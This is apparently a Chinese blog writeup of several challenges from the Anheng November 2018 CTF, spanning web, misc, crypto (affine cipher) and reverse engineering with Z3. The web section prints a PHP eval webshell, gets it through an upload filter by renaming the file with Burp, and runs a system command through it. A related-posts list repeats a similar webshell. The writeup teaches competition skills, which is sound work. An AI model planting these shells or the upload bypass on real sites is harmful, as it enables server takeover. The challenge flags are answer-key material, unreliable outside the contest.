CTF-安恒18年十一月月赛部分writeup
安恒十一月月赛writeup
昨天做了一下十一月的题目,不才只做出来几道
签到web1
这个是十月的原题,因为忘了截图所以只能提供思路
Web消息头包含了登陆框的密码
输入密码后进入上传页面,上传一句话木马1.jpg,
<?php @eval($_POST['cmd']);?>
使用burp将上传文件名改为1.php.jpg
然后post数据发现已经getshell
Flag就在上一层目录里所以post数据:system(‘dir ../’);
得出flag为:flag{698539765730b69026796420b9201e03}
具体可以参考:https://www.jianshu.com/p/e1af7cc3483d
MISC1-Numeric password
题目:
解题过程:
起初并不知道这是啥,然后百度了一下下面的名词,发现
有点意思,然后进去看看,发现了对应关系,
然后一个一个找出来,其中21世纪就是21,是在其他数字记忆表找到的,72-企鹅……
72 78 67 73 93 67 25 20 69 20 20 70 69 68 67 70 24 21 27 67 27 20 25 27 21 72 26 20 18 20 70 70 67 70 72 23 20 95
然后试着去换成ASCII码看看,发现
出现了不可显的ASCII码,那flag肯定不是这个,既然数字已经给定了,编码最有可能是凯撒移位
Payload:
写个脚本爆破一下
exp =[72,78,67,73,93,67,25,20,69,20,20,70,69,68,67,70,24,21,27,67,27,20,25,27,21,72,26,20,18,20,70,70,67,70,72,23,20,95] flag="" for i in range(1,127):
for j in exp:
flag+=chr(j+i)
print(flag)
flag=""
flag为:flag{a72c22dcbad639a92793f8202ddadf52}
MISC2-我的公子在何方
题目:
解题过程:
压缩包是加密的,打开password,直接输入提示错误。
Base64解一下
读一下txt内容
他有提示说:其载体图像是24位的BMP格式图像
百度一下:载体图像是24位的BMP格式图像隐写工具
下载这个工具
尝试打开图片发现需要密码
然后txt提示:并且密码是与图片主人公演绎的剧中相关的人物
百度搜图
天仙配…其实我根本不知道相关人物是谁,然后百度一下演员表一个一个试吧
发现dongyong就是密码,
到网站http://tool.oschina.net/encrypt解密,一时看不出这是什么加密,那就一个一个试,
什么也没,那应该还是加密了…
密码也不知道是什么,看了题解才知道是dongyong…
Payload:
所以flag为flag{97db6057a9a113c3e0a2bfb188a92698}
CRYPTO2-仿射
题目:
解题过程:
题目已经很明了了,是仿射密码,所以到网站http://ctf.ssleye.com/affine.html
解一下,已经提示了b=7那这就好办了,直接爆破a就行
网站也提示了a的取值
在a=9的时候出现了flag
题目要求提交md5所以
Payload:
flag为:flag{e8cb7b46bcf72d62e74100dd19bc63c6}
REVERSE2-Generate
题目:
题目要求输入一个数字然后给出flag
解题过程:
到ida看一下程序的逻辑
程序刚开始有一个Getinput,跟进看一下
提示输入信息,输入到DstBuf,输入的数是16字节然后转换为整数,然后传到int型中
无符号整数v11进入循环,循环32次
V8初始值为0,然后与v11异或,再和异或
疑惑的条件即是判断v7的范围是否在@以上Z以下,且不等于”_”,”{“,” }” ,如果不满足条件提示错误退出,意思就是结果是有范围的,结果在A-Z 和{ } _
接下来的操作是
最后的结果会赋给byte_408040
并且v8会和bayt_404024再次异或,byte_404020为字节
最后每次循环结束都把v11向后移一字节,然后继续进入循环
然后循环完毕后用start函数检测一下结果的开头
Start为
Exp
使用Z3约束解决
X=3658134498
Flag为flag: FLAG{___ZZLOZEZ_Z__AAPHTZIZ____}
原创文章,转载请标明出处 :https://www.cnblogs.com/pureqh
CTF-安恒18年十一月月赛部分writeup的更多相关文章
- CTF-安恒18年十二月月赛部分writeup
CTF-安恒十二月月赛部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道. WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了ad ...
- CTF-安恒19年二月月赛部分writeup
CTF-安恒19年二月月赛部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d91101 ...
- CTF-安恒19年一月月赛部分writeup
CTF-安恒19年一月月赛部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下. 里面有东西,foremost分离一下 有一张二维 ...
- 【CTF】2019湖湘杯 miscmisc writeup
题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...
- 安恒杯2月月赛-应该不是xss
1. 打开题目一看,是个留言板 2. 查看源码发现有几个js文件 依次打开发现在main.js里存在这样一段代码 3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密 ...
- 安恒杯11月月赛web题目-ezsql详细记录
通过此题目可以学习到 1.通过load_file+like来盲注获取文件内容 2.php魔术方法__get函数的用法 3.bypass linux命令过滤 题目中给了注册和登录的功能,没有源码泄露 ...
- 2018安恒杯11月月赛 MISC
题目放评论了 Numeric password 这次隐写没有按照套路出牌,很强. 记录一下 看来自主学习的能力很有待提高. 打开Numeric password.txt 中华文化博大精深,近日在教小外 ...
- 安恒2018年三月月赛MISC蜘蛛侠呀
到处都是知识盲区hhh 下载了out.pcap之后,里面有很多ICMP包 看到ttl之后联想到西湖论剑里面的一道杂项题,无果 看WP知道可以使用wireshark的tshark命令提取流量包里面的文件 ...
- 【CTF】CTFHub 技能树 文件头检查 writeup
PHP一句话木马 <?php @eval($_POST["pass"]);?> <?php eval($_REQUEST["pass"]);? ...
随机推荐
- 深入浅出React的一些细节——State
(来源于: https://facebook.github.io/react/docs/state-and-lifecycle.html 翻译by:@TimRChen) Using State Cor ...
- PHP接收IOS post过来的json数据无法解析的问题
在本地环境下运行解析OK 换到线上的环境解析失败 开始怀疑各种编码问题,解决均无效. 查看phpinfo 发现magic_quotes_gpc =on 终于找到问题所在,更改php.ini文件 mag ...
- Ubuntu-18.04 下使用Nginx搭建高可用,高并发的asp.net core集群
一.实现前的准备 以下是实现简单负载均衡的思路,图中的服务器均为虚拟机 三台Linux服务器,一台用作Nginx负载均衡(192.168.254.139),另外两台用作Asp.Net Core应用程序 ...
- ASP.NET MVC实现通用设置
网站中的设置实现方式有好几种,其中有将设置类序列化然后保存到文件中(例如使用XML序列化然后以XML形式保存在文件中),或者将设置信息保存到数据库中. 保存到数据库中的方式就是将设置的项作为key,设 ...
- MySQL Bug导致异常宕机的分析流程
原文链接:http://click.aliyun.com/m/42521/ 摘要: 本文主要通过一个bug来记录一下如何分析一个MySQL bug的崩溃信息. 版本:Percona 5.7.17-11 ...
- [控件] GlowView
GlowView 效果 说明 这是本人第二次写辉光view了,这是改进版本 源码 https://github.com/YouXianMing/UI-Component-Collection // / ...
- [翻译] ALMoviePlayerController
ALMoviePlayerController ALMoviePlayerController is a drop-in replacement for MPMoviePlayerController ...
- 基于scrapyd爬虫发布总结
一.版本情况 python以丰富的三方类库取得了众多程序员的认可,但也因此带来了众多的类库版本问题,本文总结的内容是基于最新的类库版本. 1.scrapy版本:1.1.0 D:\python\Spid ...
- Linux sudo详解
sudo:控制用户对系统命令的使用权限,root允许的操作.通过sudo可以提高普通用户的操作权限,不过这个权限是需要进行配置才可使用. 常用的命令展示 配置sudo的2种方式 1. visodu 编 ...
- HelloAndroid
Hello Android 代码 button.setOnClickListener { val alertDialog = AlertDialog.Builder(this) alertDialog ...